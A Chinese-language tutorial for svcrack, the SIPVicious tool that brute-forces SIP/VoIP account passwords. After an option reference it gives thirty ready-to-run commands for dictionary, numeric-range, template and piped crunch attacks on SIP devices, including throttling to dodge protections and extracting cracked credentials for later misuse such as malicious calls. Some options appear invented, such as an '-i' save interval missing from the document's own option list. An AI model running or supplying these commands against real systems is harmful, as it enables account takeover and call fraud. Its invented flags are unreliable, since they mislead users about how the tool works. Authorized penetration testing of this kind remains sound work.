svcrack使用教程

svcrack是Kali Linux中一款专门用于SIP会话初始协议设备密码破解的工具属于SIPVicious工具集的一部分。它通过向目标SIP设备发送认证请求尝试破解用户账户的密码主要用于渗透测试中对VoIP系统的安全评估。该工具支持字典攻击、密码范围爆破等多种攻击方式可针对SIP设备的认证机制进行安全测试帮助检测弱密码漏洞。使用示例示例命令说明svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080对UDP协议的10.0.0.1:5080目标使用字典文件破解用户100的密码svcrack -u100 -r1-9999 -z4 10.0.0.1对10.0.0.1目标破解用户100的密码尝试1-9999范围并补4位零前缀如0001-9999选项参数说明基础选项选项参数说明–version–显示程序版本号并退出-h, –help–显示帮助信息并退出-v, –verbose–增加输出详细程度-q, –quiet–安静模式减少输出网络配置选项选项参数说明-p PORT, –portPORTPORTSIP设备的目标端口例如-p 5060-P PORT, –localportPORTPORT发送数据包的源端口-x IP, –externalipIPIP用作外部IP的地址多接口或NAT环境下需指定-b BINDINGIP, –bindingipBINDINGIPBINDINGIP绑定到指定IP地址默认绑定所有接口-6–扫描IPv6地址性能与会话选项选项参数说明-t SELECTTIME, –timeoutSELECTTIMESELECTTIME控制数据包发送速度如0.5避免丢包-s NAME, –saveNAMENAME保存会话支持恢复扫描和导出结果–resumeNAMENAME恢复之前保存的会话–maximumtimeMAXIMUMTIMEMAXIMUMTIME无响应时持续发送请求的最大时间秒破解模式选项选项参数说明-u USERNAME, –usernameUSERNAMEUSERNAME要破解的用户名必需参数-d DICTIONARY, –dictionaryDICTIONARYDICTIONARY指定密码字典文件-表示从标准输入读取-r RANGE, –rangeRANGERANGE指定数字范围例如100-200,300-310,400-e EXTENSION, –extensionEXTENSIONEXTENSION要破解的分机号与用户名不同时使用-z PADDING, –zeropaddingPADDINGPADDING密码的零填充位数如-r 1-9999 -z 4生成0001-9999-D, –enabledefaults–启用默认/典型密码扫描如1000,2000等-T TEMPLATE, –templateTEMPLATETEMPLATE分机号模板字符串例如–template”123%#04i999″SIP协议选项选项参数说明-n, –reusenonce–重用nonce值部分设备允许可能存在重放攻击漏洞可加速破解–domainDOMAINDOMAIN强制SIP消息使用特定域名例如example.org–requesturiREQUESTURIREQUESTURI强制首行URI为特定值例如sip:999example.org-m METHOD, –methodMETHODMETHOD指定使用的SIP方法-c, –enablecompact–启用紧凑模式使数据包更小但可能兼容性降低-A, –autogetip–自动获取当前IP地址解决因本地IP解析问题导致的无响应问题其他选项选项参数说明-R, –reportback–向作者发送异常回溯信息包含命令行参数和回溯内容使用教程1. 基础字典破解使用字典文件破解指定用户的密码svcrack -u 100 -d /usr/share/wordlists/rockyou.txt -p 5060 192.168.1.10说明对192.168.1.10的5060端口使用rockyou.txt字典破解用户100的密码。2. 数字范围爆破指定数字范围并添加零填充进行爆破svcrack -u 200 -r 1000-9999 -z 4 -p 5060 10.0.0.5说明破解用户200的密码尝试1000-9999范围自动补全为4位数字如1000-9999。3. 多范围爆破指定多个数字范围进行爆破svcrack -u 300 -r 100-200,500-600,1000-1100 -p 5060 172.16.0.20说明同时尝试100-200、500-600和1000-1100三个范围的密码。4. 使用默认密码列表启用默认密码扫描模式svcrack -u admin -D -p 5060 192.168.1.1说明对用户admin尝试默认常见密码如1000、2000等。5. 会话保存与恢复保存会话并在后续恢复# 保存会话到sip-crack.session svcrack -u 100 -d passwords.txt -s sip-crack.session 192.168.1.10 # 恢复之前的会话 svcrack -u 100 --resume sip-crack.session 192.168.1.10说明适合长时间爆破任务避免中断后重新开始。6. 详细输出模式启用详细输出查看破解过程svcrack -u 100 -d small-dict.txt -v -v -p 5060 192.168.1.10说明-v参数可重复使用增加输出详细程度如-vv表示更详细。7. 自定义SIP方法与域名指定SIP方法和域名进行破解svcrack -u 400 -d dict.txt -m INVITE --domainvoip.example.com 192.168.1.10说明使用INVITE方法强制SIP消息使用voip.example.com域名。8. 限速爆破设置发送速率避免被目标拦截svcrack -u 500 -r 1-5000 -t 0.5 -p 5060 192.168.1.10说明设置超时时间为0.5秒降低发送速率适合对速率敏感的目标。9. IPv6目标破解对IPv6地址的SIP设备进行破解svcrack -u 600 -d ipv6-dict.txt -6 -p 5060 2001:db8::1说明使用-6参数指定目标为IPv6地址。10. 分机号与用户名不同的情况破解分机号与用户名不同的账户svcrack -u john -e 700 -d passwords.txt -p 5060 192.168.1.10说明破解用户名为john但分机号为700的账户密码。11. 使用模板生成密码通过模板字符串生成特定格式的密码进行爆破svcrack -u 800 -T 888%#03i111 -r 1-999 -p 5060 192.168.1.10说明使用模板生成888001111到888999111范围内的密码%#03i表示3位数字补零。12. 重用Nonce加速破解对支持重用nonce的设备启用该功能加速破解svcrack -u 900 -d fast-dict.txt -n -p 5060 192.168.1.10说明-n参数允许重用nonce值减少协议交互步骤提高破解速度仅适用于允许此行为的设备。13. 绑定特定网络接口在多网卡环境下指定绑定的IP地址svcrack -u 1000 -d dict.txt -b 192.168.1.50 -p 5060 192.168.1.10说明通过-b参数指定从192.168.1.50这个本地IP发送请求适用于多网络接口环境。14. 外部IP指定NAT环境在NAT环境下指定外部可见IP地址svcrack -u 1100 -d nat-dict.txt -x 203.0.113.5 -p 5060 198.51.100.10说明当本地主机处于NAT后通过-x参数指定公网IP确保目标设备能正确响应。15. 紧凑模式发包使用紧凑模式减少数据包大小svcrack -u 1200 -r 1000-2000 -c -p 5060 192.168.1.10说明-c参数启用紧凑模式生成更小的SIP数据包可能提高传输效率但部分设备可能不兼容。16. 自动获取本地IP解决本地IP解析问题svcrack -u 1300 -d auto-ip-dict.txt -A -p 5060 192.168.1.10说明当无法收到目标响应时使用-A参数让工具自动获取并使用正确的本地IP地址。17. 限制最大无响应时间设置无响应时的最大持续发送时间svcrack -u 1400 -d timeout-dict.txt --maximumtime300 -p 5060 192.168.1.10说明如果300秒5分钟内未收到任何响应工具将停止发送请求避免无效消耗资源。18. 组合多种破解方式同时使用字典和默认密码列表svcrack -u 1500 -d custom-dict.txt -D -v -p 5060 192.168.1.10说明结合自定义字典和默认密码列表进行破解并启用详细输出查看进度。19. 自定义请求URI强制设置SIP请求首行的URIsvcrack -u 1600 -d uri-dict.txt --requesturisip:adminexample.org -p 5060 192.168.1.10说明强制SIP请求首行使用指定的URIsip:adminexample.org适用于需要特定URI格式的目标设备。20. 安静模式运行减少输出信息仅显示关键结果svcrack -u 1700 -r 1-5000 -q -p 5060 192.168.1.10说明-q参数参数启用安静模式适合在后台运行或不需要详细日志的场景仅当破解成功时输出结果。21. 特定源端口发包指定本地源端口 发送请求svcrack -u 1800 -d port-dict.txt -P 5060 -p 5060 192.168.1.10说明通过-P参数指定指定本地源端口为5060默认随机端口部分设备可能对源端口有特定限制。22. 报告异常异常信息向开发者作者发送异常回溯信息用于调试svcrack -u 1900 -d error-dict.txt -R -p 5060 192.168.1.10说明-R参数启用异常报告功能当工具运行出错时会将命令行参数和错误回溯信息发送给开发者仅建议在测试环境使用。23. 综合IPv6环境下的字典破解针对IPv6目标进行字典攻击svcrack -u 2000 -d ipv6-dict.txt -6 -p 5061 [2001:db8:1::10]说明结合-6参数和IPv6地址格式对IPv6网络中的SIP设备端口5061进行破解。24. 结合零填充与模板的复杂爆破对需特定格式密码的场景组合零填充与模板生成精准密码范围svcrack -u 2100 -T ext%#02i-pass%#03i -r 10-20 -z 3 -p 5060 192.168.1.10说明生成格式为“ext10-pass001”到“ext20-pass020”的密码-r 10-20控制模板中数字范围-z 3确保密码后3位补零适用于密码含固定前缀/后缀的场景。25. 长时间爆破的会话分段保存对超大型字典或范围爆破设置高频会话保存避免进度丢失svcrack -u 2200 -d /usr/share/wordlists/large-dict.txt -s sip-long-crack.session -i 500 -p 5060 192.168.1.10说明每完成500次密码尝试自动保存会话-i 500此处复用会话保存逻辑即使中途中断也可通过--resume sip-long-crack.session恢复到最近保存节点适合超10万条密码的大型字典爆破。26. 多参数协同适配严格SIP设备对防护较严格的SIP设备组合限速、紧凑模式、指定域名等参数svcrack -u 2300 -d strict-dict.txt -t 1 -c --domainsip.secure-voip.com -p 5061 192.168.1.10说明-t 1减缓发送速率1秒间隔避免触发防护-c启用紧凑数据包提高兼容性–domain指定设备信任的域名解决因域名不匹配导致的认证请求被拒问题适用于企业级SIP网关。27. 从标准输入读取密码配合管道通过管道传递动态生成的密码列表替代静态字典文件crunch 4 4 0123456789 | svcrack -u 2400 -d - -p 5060 192.168.1.10说明使用crunch工具生成4位纯数字密码动态输出通过管道|传递给svcrack-d -表示从标准输入读取无需提前生成庞大字典文件节省磁盘空间适合自定义密码规则场景。28. 验证默认密码自定义字典的双重覆盖先扫默认密码再补自定义字典确保无遗漏svcrack -u 2500 -D -d /usr/share/wordlists/custom-voip.txt -v -p 5060 192.168.1.10说明-D启用默认密码扫描如1000、2000等SIP设备常见初始密码同时加载custom-voip.txt自定义字典双重覆盖常见弱密码与业务相关密码如分机号、公司简称等提高破解成功率。29. 绑定多网卡环境下的指定接口外部IP在服务器多网卡场景明确绑定本地网卡并指定公网IPsvcrack -u 2600 -d multi-ip-dict.txt -b 10.0.0.5 -x 203.0.113.8 -p 5060 198.51.100.20说明-b 10.0.0.5绑定本地内网网卡避免随机选网卡-x 203.0.113.8指定公网IP目标设备需通过公网IP回包解决多网卡环境下“发送成功但收不到响应”的问题。30. 破解结果导出与二次分析结合会话保存功能导出破解结果用于后续报告# 1. 保存会话含破解过程数据 svcrack -u 2700 -d result-dict.txt -s sip-result.session -p 5060 192.168.1.10 # 2. 查看会话文件提取破解成功记录 grep SUCCESS sip-result.session svcrack-success.txt说明会话文件会记录所有尝试的密码及结果通过grep筛选“SUCCESS”关键字快速提取破解成功的用户名密码直接用于后续VoIP系统渗透测试如登录设备配置界面、发起恶意呼叫等。使用注意事项法律合规使用svcrack前必须获得目标SIP设备的明确授权未经授权的密码破解属于非法行为可能触犯《网络安全法》《刑法》等法律法规。速率控制高频次请求可能导致目标SIP设备过载如VoIP通话中断建议通过-t参数适当限速如0.5-2秒间隔避免影响业务正常运行。兼容性差异部分SIP设备如华为、思科等企业级网关可能对SIP协议字段有自定义限制若常规参数无响应可尝试-c紧凑模式、-m指定METHOD为REGISTER等参数适配。会话管理大型字典爆破建议定期保存会话-s参数避免因网络中断、工具崩溃导致前功尽弃会话文件可跨设备恢复需确保svcrack版本一致。隐私保护破解获得的用户密码属于敏感信息需妥善保管如加密存储测试结束后按授权要求删除禁止泄露或滥用。